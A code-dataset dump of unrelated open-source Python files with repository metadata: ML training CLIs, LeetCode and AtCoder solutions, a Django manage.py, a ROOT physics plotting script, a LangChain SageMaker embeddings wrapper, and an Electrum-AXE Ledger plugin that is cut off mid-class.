2176690dae448b8b2e6b44a37ead6da57cf654a8 | a222c577f924c390b244beaa67b4b042c2eb7337 | /bin/kt_regression.py | ffbbe2fa6643850cdc769f50a86c7be01586058e | [] | no_license | bdqnghi/sentence-ordering | 59baf539e9f30876860b73805b74862d1beef804 | fb62eea650f132ea3d01aabb831ea49531824183 | refs/heads/master | 2020-03-28T08:07:52.637593 | 2018-02-01T11:38:51 | 2018-02-01T11:38:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py |
import click
from sent_order.models import kt_regression as model
from sent_order import cuda
# Root command group for the kt_regression training CLI.
# (Comments rather than docstrings, so click's generated --help is unchanged.)
@click.group()
def cli():
    pass
# Train the KT regression model; every argument/option is passed straight
# through to sent_order.models.kt_regression.train via *args/**kwargs.
@cli.command()
@click.argument('train_path', type=click.Path())
@click.argument('model_path', type=click.Path())
@click.option('--train_skim', type=int, default=1000000)
@click.option('--lr', type=float, default=1e-3)
@click.option('--epochs', type=int, default=1000)
@click.option('--epoch_size', type=int, default=1000)
@click.option('--batch_size', type=int, default=20)
@click.option('--lstm_dim', type=int, default=500)
@click.option('--lin_dim', type=int, default=500)
def train(*args, **kwargs):
    model.train(*args, **kwargs)
if __name__ == '__main__':
    cli()
| [
"[email protected]"
] | |
a8340cb3c5b1eb05201fa61d09a62ab1595c6306 | f02b21d5072cb66af643a7070cf0df4401229d6e | /leetcode/explore_lessons/binary_search/first_bad_version.py | 83b3e34729656e01cef998a3a4d05972fdcfb579 | [] | no_license | dbconfession78/interview_prep | af75699f191d47be1239d7f842456c68c92b95db | 7f9572fc6e72bcd3ef1a22b08db099e1d21a1943 | refs/heads/master | 2018-10-09T22:03:55.283172 | 2018-06-23T01:18:00 | 2018-06-23T01:18:00 | 110,733,251 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,631 | py | # 278. First Bad Version
"""
You are a product manager and currently leading a team to develop a new product. Unfortunately, the latest version
of your product fails the quality check. Since each version is developed based on the previous version, all the
versions after a bad version are also bad.
Suppose you have n versions [1, 2, ..., n] and you want to find out the first bad one, which causes all the
following ones to be bad.
You are given an API bool isBadVersion(version) which will return whether version is bad. Implement a function to
find the first bad version. You should minimize the number of calls to the API.
"""
# *** when pasting into LC, remove 2nd param, bv (bad version) from method def and calls
class Solution:
# def firstBadVersion_PRACTICE(self, n, bv):
def firstBadVersion(self, n, bv):
return
def firstBadVersion_PASSED(self, n, bv):
# def firstBadVersion(self, n, bv):
left = 1
right = n
while left < right:
mid = left + (right - left) // 2
if isBadVersion(mid, bv):
right = mid
else:
left = mid + 1
return left
def isBadVersion(n, bad_version):
if n >= bad_version:
return True
else:
return False
def main():
print(Solution().firstBadVersion(2, bv=1))
print(Solution().firstBadVersion(3, bv=1))
print(Solution().firstBadVersion(4, bv=4))
print(Solution().firstBadVersion(2126753390, bv=1702766719))
# * When pasting into LC, remove 2nd param, bv (bad version) from method def and calls
if __name__ == '__main__':
main()
| [
"Hyrenkosa1"
] | Hyrenkosa1 |
74f2d8bb33061539d3c0eb9e25c12a0858c5a7ff | 71b4ab667f24a53ac1212896e4055e5bf56d5ca6 | /backend/manage.py | b65988d6aa2be9092022a1a52b487db42a73d5fc | [] | no_license | crowdbotics-apps/small-firefly-27634 | d36b283d9397b5e253013a318dcce8173575fd9d | ca990c2dc7778c47af8ddbb3945c610d91ed9681 | refs/heads/master | 2023-05-05T22:22:21.938577 | 2021-06-01T00:21:39 | 2021-06-01T00:21:39 | 372,658,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run Django's command-line utility with this project's settings."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'small_firefly_27634.settings')
    try:
        from django.core.management import execute_from_command_line as run_cli
    except ImportError as exc:
        hint = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(hint) from exc
    run_cli(sys.argv)


if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
b422a944d1f29b3f7038e03480ecbf17ddf705f8 | 48f092fd8191b0218df8605dc7125e526764e59e | /NestedLoops/app2.py | 231571ece85b4688453d6c27e1842e5019388cf3 | [] | no_license | LalityaSawant/Python-Projects | 2edb430c094fe3d6b4e706cc61f885aa07e24dff | b142708256e26867f09b3063f5f3fffa305ec496 | refs/heads/master | 2020-05-01T03:00:26.012301 | 2019-03-23T22:09:33 | 2019-03-23T22:09:33 | 177,235,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | numbers = [0,1,2,3,4,5,4,3,2,1,1,1,4,6,7,8,9,9,9,9,8,7,7,6,5,5,5,6,7,8,8,7,6,5,5,4,4,3,3,3,3,3,3,2,2,3,3]
# Render each value in `numbers` as a row of '0' characters — a simple
# horizontal bar chart on stdout.  (The unused leftover `x = 'x'` was removed.)
for number in numbers:
    output = '0' * number  # string repetition instead of a char-by-char loop
    print(f''' {output}''')
"[email protected]"
] | |
b9895287e59d4d083df29a36b630b6abae9c53eb | 2d4d0b293a96267dde951f41ad155e895722b214 | /JEC/python/L2res/occ2d_draw.py | 481732bdd9b9aee823e559d76b7ac6d13697726d | [] | no_license | gqlcms/JetMET | 343f7df63d6a96edde0d618d663ec506ed1f1503 | d1390138d17312eac353093602436c6573ae2216 | refs/heads/master | 2020-07-29T11:22:11.111026 | 2019-05-09T12:44:46 | 2019-05-09T12:44:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,862 | py | #!/usr/bin/env python
''' Analysis script for L3 residuals (Z balancing)
'''
#
# Standard imports and batch mode
#
import ROOT
ROOT.gROOT.SetBatch(True)  # no GUI windows; render plots off-screen
import itertools
import os
from math import sqrt, cos, sin, pi, atan2, sinh
from RootTools.core.standard import *
from JetMET.tools.user import plot_directory as user_plot_directory
from JetMET.tools.helpers import deltaPhi, deltaR
# Object selection
from JetMET.tools.objectSelection import getFilterCut, getJets, jetVars
#
# Arguments
#
import argparse
argParser = argparse.ArgumentParser(description = "Argument parser")
argParser.add_argument('--logLevel', action='store', default='INFO', nargs='?', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE', 'NOTSET'], help="Log level for logging" )
argParser.add_argument('--triggers', action='store', default='noTriggers', nargs='?', choices=['DiPFJetAve', 'DiPFJetAve_HFJEC', 'PFJet', 'exclPFJet', 'exclDiPFJetAve', 'exclDiPFJetAveHFJEC', 'noTriggers'], help="trigger suite" )
argParser.add_argument('--ptBin', action='store', default=(163, 230), type = int, nargs=2, help="tag jet pt bin" )
argParser.add_argument('--etaSign', action='store', default=0 , type = int, choices = [-1,0,+1], help="sign of probe jet eta." )
argParser.add_argument('--era', action='store', default='Run2016H', nargs='?', choices=['Run2016', 'Run2016BCD', 'Run2016EFearly', 'Run2016FlateG', 'Run2016H', 'Run2016_18Apr', 'Run2016BCD_18Apr', 'Run2016EFearly_18Apr', 'Run2016FlateG_18Apr', 'Run2016H_18Apr', 'Run2016B_07Aug17', 'Run2016C_07Aug17', 'Run2016F_07Aug17', 'Run2016G_07Aug17', 'Run2016H_07Aug17'], help="era" )
argParser.add_argument('--small', action='store_true', help='Run only on a small subset of the data?')#, default = True)
argParser.add_argument('--cleaned', action='store_true', help='Apply jet cleaning in data')#, default = True)
argParser.add_argument('--bad', action='store_true', help='Cut on phEF*pT>300')#, default = True)
argParser.add_argument('--plot_directory', action='store', default='JEC/L2res_2D_v11', help="subdirectory for plots")
args = argParser.parse_args()
# Encode the selection flags into the output directory name.
if args.cleaned:
    args.plot_directory += '_cleaned'
if args.bad:
    args.plot_directory += '_bad'
if args.small:
    args.plot_directory += '_small'
plot_directory = os.path.join( user_plot_directory, args.plot_directory, args.era, args.triggers )
# Lumi for MC
lumi = 35.9
# DrawLatex objects for plots
tex = ROOT.TLatex()
tex.SetNDC()
tex.SetTextSize(0.04)
def drawObjects( dataMCScale, lumi ):
    """Return the TLatex header objects drawn on every canvas.

    The single annotation shows the integrated luminosity and the data/MC
    scale factor near the top of the pad; `tex` is the module-level
    ROOT.TLatex configured above (NDC coordinates).
    """
    label = 'L=%3.1f fb{}^{-1} (13 TeV) Scale %3.2f'% ( lumi, dataMCScale )
    annotations = [ (0.45, 0.95, label) ]
    drawn = []
    for pos_x, pos_y, text in annotations:
        drawn.append( tex.DrawLatex(pos_x, pos_y, text) )
    return drawn
## Formatting for 1D plots
def draw2DPlots(plots, dataMCScale):
for log in [ True, False]:
plot_directory_ = os.path.join(plot_directory, ("log" if log else "lin") )
for plot in plots:
draw_obj = getattr(plot, "drawObjects", [])
p_drawObjects = []
for o in draw_obj:
if type(o)==tuple:
p_drawObjects.append( tex.DrawLatex(*o) )
else:
p_drawObjects.append( o )
plotting.draw2D(plot,
plot_directory = plot_directory_,
logX = False, logY = False,
drawObjects = drawObjects( dataMCScale , lumi ) + p_drawObjects
)
#
# Logger
#
import JetMET.tools.logger as logger
import RootTools.core.logger as logger_rt
# Rebind the module names to configured logger instances at the requested level.
logger = logger.get_logger( args.logLevel, logFile = None)
logger_rt = logger_rt.get_logger(args.logLevel, logFile = None)

# Star import provides the JetHT_* data sample objects referenced below.
from JetMET.JEC.samples.L2res_skim import *

# Pick the data sample matching the requested era; argparse restricts
# args.era to exactly these choices, so one branch always matches.
if args.era == 'Run2016':
    data = JetHT_Run2016
elif args.era == 'Run2016BCD':
    data = JetHT_Run2016BCD
elif args.era == 'Run2016EFearly':
    data = JetHT_Run2016EFearly
elif args.era == 'Run2016FlateG':
    data = JetHT_Run2016FlateG
elif args.era == 'Run2016H':
    data = JetHT_Run2016H
elif args.era == 'Run2016_18Apr':
    data = JetHT_Run2016_18Apr
elif args.era == 'Run2016BCD_18Apr':
    data = JetHT_Run2016BCD_18Apr
elif args.era == 'Run2016EFearly_18Apr':
    data = JetHT_Run2016EFearly_18Apr
elif args.era == 'Run2016FlateG_18Apr':
    data = JetHT_Run2016FlateG_18Apr
elif args.era == 'Run2016H_18Apr':
    data = JetHT_Run2016H_18Apr
elif args.era == 'Run2016B_07Aug17':
    data = JetHT_Run2016B_07Aug17
elif args.era == 'Run2016C_07Aug17':
    data = JetHT_Run2016C_07Aug17
elif args.era == 'Run2016F_07Aug17':
    data = JetHT_Run2016F_07Aug17
elif args.era == 'Run2016G_07Aug17':
    data = JetHT_Run2016G_07Aug17
elif args.era == 'Run2016H_07Aug17':
    data = JetHT_Run2016H_07Aug17
# Build the list of HLT trigger requirements for the chosen suite.  The
# excl* suites import pre-built exclusive-threshold cut strings instead of
# plain trigger names; any other string is used verbatim as a single trigger.
if args.triggers == 'noTriggers':
    triggers = []
elif args.triggers=='DiPFJetAve':
    triggers = [
        "HLT_DiPFJetAve40",
        "HLT_DiPFJetAve60",
        "HLT_DiPFJetAve80",
        "HLT_DiPFJetAve140",
        "HLT_DiPFJetAve200",
        "HLT_DiPFJetAve260",
        "HLT_DiPFJetAve320",
        "HLT_DiPFJetAve400",
        "HLT_DiPFJetAve500",
    ]
elif args.triggers == 'PFJet':
    triggers = [
        "HLT_PFJet40",
        "HLT_PFJet60",
        "HLT_PFJet80",
        "HLT_PFJet140",
        "HLT_PFJet200",
        "HLT_PFJet260",
        "HLT_PFJet320",
        "HLT_PFJet400",
        "HLT_PFJet450",
        "HLT_PFJet500",
    ]
elif args.triggers == 'DiPFJetAve_HFJEC':
    triggers = [
        "HLT_DiPFJetAve60_HFJEC",
        "HLT_DiPFJetAve80_HFJEC",
        "HLT_DiPFJetAve100_HFJEC",
        "HLT_DiPFJetAve160_HFJEC",
        "HLT_DiPFJetAve220_HFJEC",
        "HLT_DiPFJetAve300_HFJEC",
    ]
elif args.triggers == 'exclPFJet':
    from JetMET.JEC.L2res.thresholds import exclPFJets
    triggers = [ exclPFJets ]
elif args.triggers == 'exclDiPFJetAve':
    from JetMET.JEC.L2res.thresholds import exclDiPFJetAve
    triggers = [ exclDiPFJetAve ]
elif args.triggers == 'exclDiPFJetAveHFJEC':
    from JetMET.JEC.L2res.thresholds import exclDiPFJetAveHFJEC
    triggers = [ exclDiPFJetAveHFJEC ]
else:
    triggers = [ args.triggers ]
samples = data

from JetMET.JEC.L2res.jet_cleaning import jet_cleaning

# Require at least one of the selected triggers to have fired.
if len(triggers)>0:
    data.addSelectionString( "("+"||".join(triggers)+")")
# Optionally apply the jet-cleaning selection string to the data sample.
if args.cleaned:
    data.addSelectionString( jet_cleaning )

# Event selection: each entry is (short name, TTree cut string).
selection = [
#    ("btb", "cos(Jet_phi[tag_jet_index] - Jet_phi[probe_jet_index]) < cos(2.7)"),
#    ("a30", "alpha<0.3"),
    ("EGM", "A>0.4&&Jet_phEF[probe_jet_index]>0.8")
]
if args.bad:
    selection.append( ("bad", "Jet_phEF[probe_jet_index]*Jet_pt[probe_jet_index]>250") )

#tag_jet_bin = (163, 230)
#probe_jet_abs_eta_bin = (2.853, 2.964 )
tag_jet_bin = tuple(args.ptBin)

# Choose how the probe-jet eta enters the draw expression and labels,
# depending on the requested eta sign (-1, +1, or 0 for both endcaps).
if args.etaSign == -1:
    probe_jet_eta_string = "-Jet_eta[probe_jet_index]"
    eta_string = "negeta"
    eta_tex_string = "#eta<0"
elif args.etaSign == +1:
    probe_jet_eta_string = "Jet_eta[probe_jet_index]"
    eta_string = "poseta"
    eta_tex_string = "#eta>0"
elif args.etaSign == 0:
    probe_jet_eta_string = "abs(Jet_eta[probe_jet_index])"
    eta_string = "alleta"
    eta_tex_string = "(both endcaps)"

# kinematic selection on tag & probe jet
kinSelectionString = "%f<Jet_pt[tag_jet_index]&&Jet_pt[tag_jet_index]<%f "% ( tag_jet_bin[0], tag_jet_bin[1] )
logger.info( "Jet selection: %s", kinSelectionString )
data.addSelectionString( "&&".join(c[1] for c in selection))
data.addSelectionString( kinSelectionString )
# For quick test runs keep only a single input file.
if args.small:
    data.reduceFiles( to = 1 )

#colors = [ j+1 for j in range(0,9) ] + [ j+31 for j in range(9,18) ]

# Probe-jet direction projected onto the plane:
# (x, y) = (cos(phi), sin(phi)) / sinh(eta), weighted by met_chsPt * weight
# (only entries with positive probe_jet_eta_string contribute).
variableString = "1/sinh(%s)*sin(Jet_phi[probe_jet_index]):1/sinh(%s)*cos(Jet_phi[probe_jet_index])" % ( probe_jet_eta_string, probe_jet_eta_string )
weightString = "met_chsPt*weight*(%s>0)"%probe_jet_eta_string
logger.info( "Get plot with %s, and weight %s", variableString, weightString )
h_data = data.get2DHistoFromDraw(variableString = variableString, binning = [60, -0.3, 0.3, 60, -0.3, 0.3], weightString=weightString)

# Guide circles at radius 1/sinh(eta) for |eta| = 2.5 and 3 (hollow).
circles = [ ROOT.TArc(0,0,1./sinh(eta)) for eta in [2.5, 3] ]
for c in circles:
    c.SetFillStyle(0)

plot = Plot2D.fromHisto( name = '2D_%s_pt_%i_%i' % ( eta_string, tag_jet_bin[0], tag_jet_bin[1]),
    # [ [ h_MC ] ] + histos_data, texX = texX, texY = "Number of Events"
    histos = [[ h_data ]], texX = "X (/Z)", texY = "Y (/Z)"
    )

# Attach the circles plus text annotations (tuples become TLatex in draw2DPlots).
plot.drawObjects = circles
plot.drawObjects += [
    (0.17, 0.86, args.era + ' ' + eta_tex_string),
    (0.17, 0.81, '%i #leq p_{T,tag} < %i'% tag_jet_bin ),
    (0.59, 0.41, '|#eta| = 3' ),
    (0.65, 0.35, '|#eta| = 2.5' ),
]

draw2DPlots( [plot], 1.)
| [
"[email protected]"
] | |
d04872bac0a950de742027fee0e7b9b5f0e2ab53 | 544d4f57945a08cb382b1ef04ae73fb6eaccfb29 | /105.py | 9c481c8d2568ed9f326e517c84e96b9ec4d3b0b3 | [
"LicenseRef-scancode-unicode",
"ICU",
"NAIST-2003",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | rzhang1654/pyco | 7ea06a49cb169b4f70bf5d832ed39af5e416ee60 | 80a23c591da0f36f240f644ce8799fe8f9f5ed98 | refs/heads/master | 2023-05-25T11:44:14.027525 | 2021-06-02T14:57:17 | 2021-06-02T14:57:17 | 373,204,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | #!/usr/bin/env python
#
from atexit import register
from re import compile
from threading import Thread
from time import ctime
from urllib import urlopen as uopen
# Pre-compiled pattern extracting the `type` attribute of <script> tags.
REGEX = compile(r'<script type="(.+?)">')
# Base URL; a PAGEs key is appended to it when fetching (see getScript).
EXELON = 'https://www.exeloncorp.com/leadership-and-governance'
# Maps URL suffix -> human readable page title used in the report lines.
PAGEs = {
    'ethics-and-conduct': 'ethics and conduct',
    'executive-profiles': 'executive profiles',
    'governance-overview': 'governance overview',
}
def getScript(title):
    """Download EXELON + title and return the first <script type="..."> value.

    Raises IndexError when the fetched page contains no matching tag.
    """
    page = uopen('%s%s' % (EXELON,title))
    try:
        data = page.read()
    finally:
        # Fix: close the connection even when read() raises; the original
        # leaked the handle on a failed read.
        page.close()
    return REGEX.findall(data)[0]
def _showScript(title):
    # Print one report line; executed on a worker thread started in _main.
    print '- %s is %s' % (PAGEs[title], getScript(title))
def _main():
    # Fetch all pages concurrently: one thread per key in PAGEs.
    print 'At', ctime(), 'on Exelon ...'
    for title in PAGEs:
        Thread(target=_showScript, args=(title,)).start()
@register
def _atexit():
    # atexit handler: announce completion when the interpreter shuts down.
    print 'all DONE at:', ctime()
# Run only when executed as a script, not on import.
if __name__ == '__main__':
    _main()
| [
"[email protected]"
] | |
81120867431d79bbfad20b6629306fb294a78aea | e5654e71ad4f043bb28105c3b6f3cd833e1c52dc | /openai/venv/lib/python3.10/site-packages/langchain/embeddings/sagemaker_endpoint.py | e1371a7d99936cbd102ccb6ba13e593ba23abc8a | [] | no_license | henrymendez/garage | 0b795f020a68fe2d349b556fb8567f6b96488ed5 | b7aaa920a52613e3f1f04fa5cd7568ad37302d11 | refs/heads/master | 2023-07-19T20:16:02.792007 | 2023-07-07T16:58:15 | 2023-07-07T16:58:15 | 67,760,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,006 | py | """Wrapper around Sagemaker InvokeEndpoint API."""
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Extra, root_validator
from langchain.embeddings.base import Embeddings
from langchain.llms.sagemaker_endpoint import ContentHandlerBase
class SagemakerEndpointEmbeddings(BaseModel, Embeddings):
    """Wrapper around custom Sagemaker Inference Endpoints.

    To use, you must supply the endpoint name from your deployed
    Sagemaker model & the region where it is deployed.

    To authenticate, the AWS client uses the following methods to
    automatically load credentials:
    https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html

    If a specific credential profile should be used, you must pass
    the name of the profile from the ~/.aws/credentials file that is to be used.

    Make sure the credentials / roles used have the required policies to
    access the Sagemaker endpoint.
    See: https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html
    """

    """
    Example:
        .. code-block:: python

            from langchain.embeddings import SagemakerEndpointEmbeddings
            endpoint_name = (
                "my-endpoint-name"
            )
            region_name = (
                "us-west-2"
            )
            credentials_profile_name = (
                "default"
            )
            se = SagemakerEndpointEmbeddings(
                endpoint_name=endpoint_name,
                region_name=region_name,
                credentials_profile_name=credentials_profile_name
            )
    """

    # boto3 "sagemaker-runtime" client, filled in by validate_environment.
    client: Any #: :meta private:

    endpoint_name: str = ""
    """The name of the endpoint from the deployed Sagemaker model.
    Must be unique within an AWS Region."""

    region_name: str = ""
    """The aws region where the Sagemaker model is deployed, eg. `us-west-2`."""

    credentials_profile_name: Optional[str] = None
    """The name of the profile in the ~/.aws/credentials or ~/.aws/config files, which
    has either access keys or role information specified.
    If not specified, the default credential profile or, if on an EC2 instance,
    credentials from IMDS will be used.
    See: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html
    """

    content_handler: ContentHandlerBase
    """The content handler class that provides an input and
    output transform functions to handle formats between LLM
    and the endpoint.
    """

    """
    Example:
        .. code-block:: python

            from langchain.llms.sagemaker_endpoint import ContentHandlerBase

            class ContentHandler(ContentHandlerBase):
                content_type = "application/json"
                accepts = "application/json"

                def transform_input(self, prompt: str, model_kwargs: Dict) -> bytes:
                    input_str = json.dumps({prompt: prompt, **model_kwargs})
                    return input_str.encode('utf-8')

                def transform_output(self, output: bytes) -> str:
                    response_json = json.loads(output.read().decode("utf-8"))
                    return response_json[0]["generated_text"]
    """

    model_kwargs: Optional[Dict] = None
    """Key word arguments to pass to the model."""

    endpoint_kwargs: Optional[Dict] = None
    """Optional attributes passed to the invoke_endpoint
    function. See `boto3`_. docs for more info.
    .. _boto3: <https://boto3.amazonaws.com/v1/documentation/api/latest/index.html>
    """

    class Config:
        """Configuration for this pydantic object."""

        # Reject unknown constructor kwargs; allow non-pydantic field types
        # such as the boto3 client and the ContentHandlerBase instance.
        extra = Extra.forbid
        arbitrary_types_allowed = True

    @root_validator()
    def validate_environment(cls, values: Dict) -> Dict:
        """Validate that AWS credentials to and python package exists in environment."""
        try:
            import boto3

            try:
                if values["credentials_profile_name"] is not None:
                    session = boto3.Session(
                        profile_name=values["credentials_profile_name"]
                    )
                else:
                    # use default credentials
                    session = boto3.Session()

                values["client"] = session.client(
                    "sagemaker-runtime", region_name=values["region_name"]
                )

            except Exception as e:
                raise ValueError(
                    "Could not load credentials to authenticate with AWS client. "
                    "Please check that credentials in the specified "
                    "profile name are valid."
                ) from e

        except ImportError:
            raise ValueError(
                "Could not import boto3 python package. "
                "Please install it with `pip install boto3`."
            )
        return values

    def _embedding_func(self, texts: List[str]) -> List[float]:
        """Call out to SageMaker Inference embedding endpoint."""
        # replace newlines, which can negatively affect performance.
        texts = list(map(lambda x: x.replace("\n", " "), texts))
        _model_kwargs = self.model_kwargs or {}
        _endpoint_kwargs = self.endpoint_kwargs or {}

        body = self.content_handler.transform_input(texts, _model_kwargs)
        content_type = self.content_handler.content_type
        accepts = self.content_handler.accepts

        # send request
        try:
            response = self.client.invoke_endpoint(
                EndpointName=self.endpoint_name,
                Body=body,
                ContentType=content_type,
                Accept=accepts,
                **_endpoint_kwargs,
            )
        except Exception as e:
            raise ValueError(f"Error raised by inference endpoint: {e}")

        # NOTE(review): the declared return type List[float] may not match what
        # transform_output yields for a multi-text request -- the shape is
        # defined entirely by the content handler; confirm.
        return self.content_handler.transform_output(response["Body"])

    def embed_documents(
        self, texts: List[str], chunk_size: int = 64
    ) -> List[List[float]]:
        """Compute doc embeddings using a SageMaker Inference Endpoint.

        Args:
            texts: The list of texts to embed.
            chunk_size: The chunk size defines how many input texts will
                be grouped together as request. If None, will use the
                chunk size specified by the class.

        Returns:
            List of embeddings, one for each text.
        """
        results = []
        _chunk_size = len(texts) if chunk_size > len(texts) else chunk_size
        for i in range(0, len(texts), _chunk_size):
            # NOTE(review): each chunk's whole result is appended as a single
            # element, so len(results) equals the number of chunks, not
            # len(texts) as documented above -- `results.extend(...)` may have
            # been intended; confirm against the content handler's output.
            response = self._embedding_func(texts[i : i + _chunk_size])
            results.append(response)
        return results

    def embed_query(self, text: str) -> List[float]:
        """Compute query embeddings using a SageMaker inference endpoint.

        Args:
            text: The text to embed.

        Returns:
            Embeddings for the text.
        """
        return self._embedding_func([text])
| [
"[email protected]"
] | |
c9e58e81a27a870849d3bfed9fa9d0ddacf18134 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/abc038/D/4502471.py | 1539cc5c3366975fe7df695b0a53f39763ae4186 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | import sys
import bisect
# Fast input: rebind input() to raw stdin readline (shadows the builtin).
input=sys.stdin.readline
N=int(input())
# Each record is a pair of integers.
data=[tuple(map(int,input().split())) for _ in range(N)]

# Sort ascending by the first coordinate; within each run of equal first
# coordinates, reorder the second coordinate descending so that at most one
# element per run can enter a strictly increasing chain.
data.sort()
data2=[]
now=[]
for d in data:
    if len(now)==0:
        now.append(d)
        continue
    if now[0][0]!=d[0]:
        # First coordinate changed: flush the finished run and start a new one.
        now.sort(key=lambda x:x[1],reverse=True)
        data2+=now
        now=[d]
    elif now[0][0]==d[0]:
        now.append(d)
# Flush the final run.
# NOTE(review): indentation was reconstructed here -- this flush must sit
# after the loop so the last group is included; confirm against the original.
now.sort(key=lambda x:x[1],reverse=True)
data2+=now
data=data2

# LIS-style DP with bisect: dp[k] holds the second coordinate ending the best
# chain of length k (dp[0]=0 is a sentinel), dp2[k] the full pair there.
inf=float('inf')
dp=[inf]*(len(data)+1)
dp[0]=0
dp2=[(inf,inf)]*(len(data)+1)
dp2[0]=(0,0)
for i in range(len(data)):
    idx=bisect.bisect_left(dp,data[i][1])
    # Extend only if strictly larger in the first coordinate than the chain
    # of length idx-1 and strictly smaller in the second coordinate than the
    # current occupant of slot idx.
    if dp2[idx-1][0]<data[i][0] and data[i][1]<dp2[idx][1]:
        dp[idx]=data[i][1]
        dp2[idx]=data[i]

# Answer: number of reachable dp slots minus the sentinel entry.
print(len([i for i in dp if i<inf])-1)
"[email protected]"
] | |
acf6fb9f47e54f8b0c090b7fe6dc50e0a77e2318 | e634f90bc999a2903c92f66384a867a474b40d9c | /Source/Main.py | f6c46809d31de7e9aa6b1e9aee2033be4f65fe5d | [
"MIT"
] | permissive | Dmunch04/Plistr | 69f7217fbea24e48870667c8507845ddd1a63547 | 39d70e3b9f1a827d48a6a951617da0892978515c | refs/heads/master | 2020-07-15T21:16:55.539440 | 2019-09-01T14:27:04 | 2019-09-01T14:27:04 | 205,650,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | from Window import Window
from Helpers import Loader
class Plistr:
    """Application object: loads the given file via Loader and shows it in a Window."""

    def __init__ (self, Filename):
        # Path of the file to display.
        self.Filename = Filename
        # Items produced by the Helpers loader for this file.
        self.Items = Loader.LoadFile (self.Filename)
        # Window constructed with the file name.
        self.Window = Window (Filename)

    def Run (self):
        # Hand the loaded items to the window to display.
        self.Window.Run (self.Items)
| [
"[email protected]"
] | |
b860558d9525b80e85652f2e33d5aa57e3fd91cc | 0cab535ec5b00aa1f99614062ac53017bc048333 | /tensorflow_graphics/io/__init__.py | 53ac26a35cb4db9576f1689a51a5b7be41d19f55 | [
"Apache-2.0"
] | permissive | yangbooom/graphics | d3eb6e4940ee624b64d4d87af9de6c7e2c6d924a | 2a759c0981372cc58e51e77ba939b00693cb9fdf | refs/heads/master | 2022-07-13T11:12:33.204592 | 2020-05-17T00:23:02 | 2020-05-17T00:23:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""`tensorflow_graphics.io` module."""
# pylint: disable=g-import-not-at-top
from tensorflow_graphics.util.doc import _import_tfg_docs
if _import_tfg_docs():
  # Only imported while building the API documentation.
  # Fix: triangle_mesh lives in tensorflow_graphics.io (this package);
  # the original imported it from tensorflow.io, which has no such module.
  from tensorflow_graphics.io import triangle_mesh
from tensorflow_graphics.util import export_api as _export_api

# API contains submodules of tensorflow_graphics.io.
__all__ = _export_api.get_modules()
# pylint: enable=g-import-not-at-top
| [
"[email protected]"
] | |
7fede01bad23361cbb201f9ae03d1b537a916785 | 5068bc927a7fff73923ce95862ff70120160c491 | /electrum_axe/plugins/ledger/qt.py | 2c36c1397995c78a133b363be3051db888fc4fa6 | [
"MIT"
] | permissive | AXErunners/electrum-axe | cdbce2dbb92e23e32e9f9b733ae9f65f51c0ae9f | 7ef05088c0edaf0688fb167df353d6da619ebf2f | refs/heads/master | 2021-04-03T09:40:37.109317 | 2020-08-27T16:53:18 | 2020-08-27T16:53:18 | 124,705,752 | 336 | 75 | MIT | 2020-10-17T18:30:25 | 2018-03-10T23:00:48 | Python | UTF-8 | Python | false | false | 2,709 | py | from functools import partial
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QInputDialog, QLabel, QVBoxLayout, QLineEdit
from electrum_axe.i18n import _
from electrum_axe.plugin import hook
from electrum_axe.wallet import Standard_Wallet
from electrum_axe.gui.qt.util import WindowModalDialog
from .ledger import LedgerPlugin
from ..hw_wallet.qt import QtHandlerBase, QtPluginBase
from ..hw_wallet.plugin import only_hook_if_libraries_available
class Plugin(LedgerPlugin, QtPluginBase):
    # Icon resources for the unpaired / paired device states.
    icon_unpaired = "ledger_unpaired.png"
    icon_paired = "ledger.png"

    def create_handler(self, window):
        """Create the Qt handler mediating between the GUI and the device."""
        return Ledger_Handler(window)

    @only_hook_if_libraries_available
    @hook
    def receive_menu(self, menu, addrs, wallet):
        """Add a 'Show on Ledger' entry to the receive-address context menu.

        Only offered for a Standard_Wallet whose keystore matches this
        plugin's keystore class and when exactly one address is selected.
        """
        if type(wallet) is not Standard_Wallet:
            return
        keystore = wallet.get_keystore()
        if type(keystore) == self.keystore_class and len(addrs) == 1:
            def show_address():
                # Queue the device interaction onto the keystore's thread.
                keystore.thread.add(partial(self.show_address, wallet, addrs[0]))
            menu.addAction(_("Show on Ledger"), show_address)
class Ledger_Handler(QtHandlerBase):
    # Signals route dialog requests from device code to the GUI: get_auth /
